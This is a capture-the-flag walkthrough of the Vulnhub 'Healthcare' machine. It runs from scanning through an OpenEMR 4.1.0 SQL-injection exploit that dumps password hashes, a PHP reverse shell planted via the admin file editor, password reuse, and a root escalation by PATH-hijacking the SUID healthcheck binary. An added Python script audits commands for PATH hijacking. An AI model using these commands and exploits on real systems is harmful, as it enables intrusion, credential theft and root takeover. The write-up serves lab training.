Healthcare
Author: jason huawen
Target machine information
Name:
Address:
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:69:f3:d5 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:f6:d1:32 1 60 PCS Systemtechnik GmbH
Kali's netdiscover identifies the target host's IP address as 192.168.56.254 (192.168.56.1 is the host and 192.168.56.100 is VirtualBox's DHCP server on the host-only network, so neither is the target).
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3d
80/tcp open http Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
|_/all_our_e-mail_addresses /admin/ /
|_http-title: Coming Soon 2
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
The Nmap scan shows two open ports: 21 (ftp, ProFTPD 1.3.3d) and 80 (http, Apache 2.2.17 on PCLinuxOS 2011); the http-robots.txt script has already pulled the robots.txt entries.
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
Name (192.168.56.254:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit ProFTPD
-----------------------------------------------------------------
Two observations at this point:
- FTP does not allow anonymous access.
- The FTP service is ProFTPD, so a mod_copy exploit came to mind. The searchsploit output is cut off here; note that the mod_copy SITE CPFR/CPTO bug (CVE-2015-3306) is for ProFTPD 1.3.5, whereas the banner here says 1.3.3d, so the product name alone is not a lead and this path was not pursued further.
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ curl http://192.168.56.254/robots.txt
# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /
robots.txt has an /admin/ entry, but requesting that directory returns a not-found error. This is the distribution's stock robots.txt (see the svn.mandriva.com header), and its own comment says /admin/ is a spam-bot trap for grepping the logs, so the 404 is expected rather than a sign of a hidden panel. Next, run nikto:
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-04-21 22:08:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
+ Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan 6 01:21:38 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ "robots.txt" contains 8 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 9543 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-04-21 22:09:10 (GMT-4) (57 seconds)
---------------------------------------------------------------------------
The nikto result flags /cgi-bin/test.cgi as likely vulnerable to Shellshock (CVE-2014-6271), and a search turns up exploit code:
https://www.exploit-db.com/exploits/34900
But that code did not work here, so another way in had to be found.
Next, scan for directories:
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,html,txt,sh,php
[+] Timeout: 10s
===============================================================
2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
/index.html (Status: 200) [Size: 5031]
/index (Status: 200) [Size: 5031]
/.html (Status: 403) [Size: 1000]
/css (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
/js (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
/vendor (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
/favicon (Status: 200) [Size: 1406]
/robots (Status: 200) [Size: 620]
/robots.txt (Status: 200) [Size: 620]
/fonts (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
/gitweb (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
/.html (Status: 403) [Size: 1000]
/phpMyAdmin (Status: 403) [Size: 59]
/server-status (Status: 403) [Size: 1000]
/server-info (Status: 403) [Size: 1000]
/openemr (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]
The scan turns up the /openemr directory; the other directories turned out to be of no value.
Visiting it shows the CMS is OpenEMR, version 4.1.0. Check for known vulnerabilities:
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit openEMR 4.1.0
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 4.1.0 - 'u' SQL Injection | php/webapps/49742.py
Openemr-4.1.0 - SQL Injection | php/webapps/17998.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit -m php/webapps/49742.py
Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
URL: https://www.exploit-db.com/exploits/49742
Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Healthcare/49742.py
Copy the exploit to the working directory and run it:
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ python 49742.py
____ ________ _______ __ __ ___ ____
/ __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \
/ / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / /
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/
/_/
____ ___ __ _____ ____ __ _
/ __ )/ (_)___ ____/ / / ___// __ \ / / (_)
/ /_/ / / / __ \/ __ / \__ \/ / / / / / / /
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike
[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d
Crack them with an online lookup site:
https://md5decrypt.net/en/Sha1/#answer
This gives ackbar as admin's password and medical as the other user's. The 40-hex-character hashes are unsalted SHA-1, which is why a plain lookup works; on a real engagement, crack them offline (hashcat -m 100) rather than handing client hashes to a third-party site.
Log in at:
http://192.168.56.254/openemr/
Under the Administration menu there is a Files editor. Check whether the PHP reverse-shell code (shell.php) can be appended to one of the editable files, for example statement.inc.php; the editor also shows the file's full path. After appending the shell.php code to statement.inc.php, start the listener and then request the file:
http://192.168.56.254/openemr/sites/default/statement.inc.php
This gives a reverse shell on Kali, running as the apache user:
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
20:50:43 up 1:55, 0 users, load average: 1.00, 1.28, 3.57
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd /home
cd /home
bash-4.1$ ls -alh
ls -alh
total 20K
drwxr-xr-x 5 root root 4.0K Jul 29 2020 .
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ..
drwxr-xr-x 27 almirant almirant 4.0K Jul 29 2020 almirant
drwxr-xr-x 31 medical medical 4.0K Nov 5 2011 medical
drwxr-xr-x 3 root root 4.0K Nov 4 2011 mysql
bash-4.1$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
This yields the user flag (the transcript does not show the change into the directory that holds user.txt).
Privilege escalation
Check whether the password found earlier also lets us switch to medical:
bash-4.1$ su - medical
su - medical
Password: medical
[medical@localhost ~]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)
The guess was right.
[medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/healthcheck has the SUID bit set (the rest of the find output is omitted here).
[medical@localhost backups]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h
The strings output shows that healthcheck imports setuid, setgid and system, and that the command string it runs invokes ifconfig (and the other tools) by bare name. system() passes the string to sh with the caller's environment unchanged, so a file named ifconfig in a writable directory placed at the front of PATH is executed as root. This is the classic SUID PATH hijack; on the binary side the fix is to call the tools by absolute path or to reset PATH to a fixed value before system().
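Before dropping a fake ifconfig it is worth being systematic about which of the commands in that system() string are actually hijackable from the invoking user's PATH. The following is an added audit script (mine, not from the walkthrough or the box); it parses the command string recovered with strings above and walks a given PATH in order, reporting each bare command for which a writable directory is searched before the directory holding the real binary. The temporary sbin/tmp layout it builds is a constructed stand-in for the target, not the real filesystem.

```python
"""Audit a system() command string for PATH hijacking.

Added example, not code from the walkthrough or from the Healthcare box.
HEALTHCHECK_CMD is the string recovered with strings(1) above; the PATH values
and the set of writable directories are supplied by the caller, and
build_demo_layout() creates a constructed stand-in for the target's filesystem
so the audit can run offline.
"""
import os
import shlex
import tempfile

# Command string embedded in /usr/bin/healthcheck, as shown by strings(1)
HEALTHCHECK_CMD = ("clear ; echo 'System Health Check' ; echo '' ; "
                   "echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h")


def commands_in(cmdline: str) -> list[str]:
    """Return the command word of each ';'-separated simple command, in order."""
    cmds, expect_cmd = [], True
    for tok in shlex.split(cmdline):
        if tok == ";":
            expect_cmd = True
        elif expect_cmd:
            cmds.append(tok)
            expect_cmd = False
    return cmds


def hijackable(cmdline: str, path: str, writable: set[str]) -> dict[str, str]:
    """Map each bare command name to the first writable PATH directory that is
    searched before the real binary is found. Absolute paths are never reported:
    sh does not consult PATH for them."""
    result = {}
    for cmd in dict.fromkeys(commands_in(cmdline)):  # unique, order kept
        if os.path.isabs(cmd):
            continue
        for d in path.split(os.pathsep):
            if d in writable:
                result[cmd] = d  # an attacker's copy here would be found first
                break
            if os.access(os.path.join(d, cmd), os.X_OK):
                break  # the genuine binary wins for this PATH


    return result


def build_demo_layout() -> tuple[str, str]:
    """Constructed stand-in for the target: a 'sbin' directory holding a
    stand-in ifconfig and an empty, writable 'tmp' directory."""
    base = tempfile.mkdtemp(prefix="healthcheck-audit-")
    sbin, tmp = os.path.join(base, "sbin"), os.path.join(base, "tmp")
    os.mkdir(sbin)
    os.mkdir(tmp)
    stub = os.path.join(sbin, "ifconfig")
    with open(stub, "w") as f:
        f.write("#!/bin/sh\necho 'stand-in ifconfig'\n")
    os.chmod(stub, 0o755)
    return sbin, tmp


def audit_demo() -> dict[str, dict[str, str]]:
    """Run the audit under three PATH settings the medical user might have."""
    sbin, tmp = build_demo_layout()
    return {
        # what the walkthrough does: export PATH=/tmp:$PATH
        "attacker_first": hijackable(HEALTHCHECK_CMD, f"{tmp}:{sbin}", {tmp}),
        # /tmp later in PATH: ifconfig is safe, commands missing from sbin are not
        "real_first": hijackable(HEALTHCHECK_CMD, f"{sbin}:{tmp}", {tmp}),
        # what a setuid program should enforce itself: a fixed PATH with no
        # writable entries (or absolute paths, which hijackable() never reports)
        "fixed_path": hijackable(HEALTHCHECK_CMD, sbin, {tmp}),
    }


if __name__ == "__main__":
    for name, hits in audit_demo().items():
        print(f"{name:15s} hijackable: {hits or 'none'}")
```

The "real_first" case is the one to notice: even without prepending /tmp, any command that the invoking user's PATH cannot resolve before reaching a writable directory is hijackable, which is why a setuid wrapper has to fix PATH itself instead of trusting whatever the caller exported.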
cd /tmp
[medical@localhost tmp]$ echo '/bin/bash' > ifconfig
echo '/bin/bash' > ifconfig
[medical@localhost tmp]$ chmod 777 ifconfig
chmod 777 ifconfig
[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check
Scanning System
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 920K
drwxr-x--- 20 root root 4.0K Jul 29 2020 ./
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
-rw------- 1 root root 426 Jul 29 2020 .bash_history
-rw-r--r-- 1 root root 193 Sep 24 2011 .bash_profile
-rw-rw-rw- 1 root root 422 Sep 6 2011 .bashrc
drwxr-xr-x 2 root root 4.0K Sep 12 2011 .cache/
drwx------ 6 root root 4.0K Sep 12 2011 .config/
drwx------ 3 root root 4.0K Jul 19 2011 .dbus/
drwxr--r-- 2 root root 4.0K Jul 19 2011 Desktop/
-rw------- 1 root root 28 Jul 22 2011 .dmrc
drwx------ 3 root root 4.0K Sep 8 2011 Documents/
drwx------ 2 root root 4.0K Sep 6 2011 drakx/
drwx------ 4 root root 4.0K Sep 24 2011 .gconf/
drwx------ 2 root root 4.0K Sep 24 2011 .gconfd/
drwx------ 3 root root 4.0K Sep 12 2011 .gnome2/
drwx------ 2 root root 4.0K Sep 12 2011 .gnome2_private/
drwx------ 3 root root 4.0K Jul 29 2020 .gnupg/
drwx------ 2 root root 4.0K Jul 19 2011 .gvfs/
-rwxr-xr-x 1 root root 5.7K Jul 29 2020 healthcheck*
-rw-r--r-- 1 root root 182 Jul 29 2020 healthcheck.c
-rw------- 1 root root 0 Sep 11 2011 .ICEauthority
drwx------ 3 root root 4.0K Sep 6 2011 .local/
drwx------ 3 root root 4.0K Nov 5 2011 .mc/
-rw-r--r-- 1 root root 0 Oct 22 2010 .mdk-menu-migrated
-rw-r--r-- 1 root root 0 Jul 21 2011 .menu-updates.stamp
-rw------- 1 root root 6 Jul 29 2020 .mysql_history
-rw-rw-rw- 1 root root 2.1K Jul 29 2020 root.txt
-rw-r--r-- 1 root root 797K Apr 12 2020 sudo.rpm
drwx------ 2 root root 4.0K Nov 5 2011 .synaptic/
drwx------ 2 root root 4.0K Sep 11 2011 .thumbnails/
drwx------ 2 root root 4.0K Apr 21 18:54 tmp/
drwxr-xr-x 2 root root 4.0K Jul 29 2020 .xauth/
-rw-r--r-- 1 root root 1.9K Jul 6 2011 .xbindkeysrc
[root@localhost root]# cat root.txt
cat root.txt
[ASCII-art banner from root.txt, garbled in extraction]
Thanks for Playing!
Follow me at: http://v1n1v131r4.com
root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
[root@localhost root]#
At this point we have a root shell and the root flag.
Lessons learned
- After seeing the possible Shellshock in the nikto output I assumed that vulnerability was the way in and skipped the normal web-application steps, namely directory scanning; enough patience (a large wordlist) is also needed to find the right directory, otherwise this box has no way in.
Please credit the source when reposting; link to this article: https://www.uj5u.com/qita/550874.html
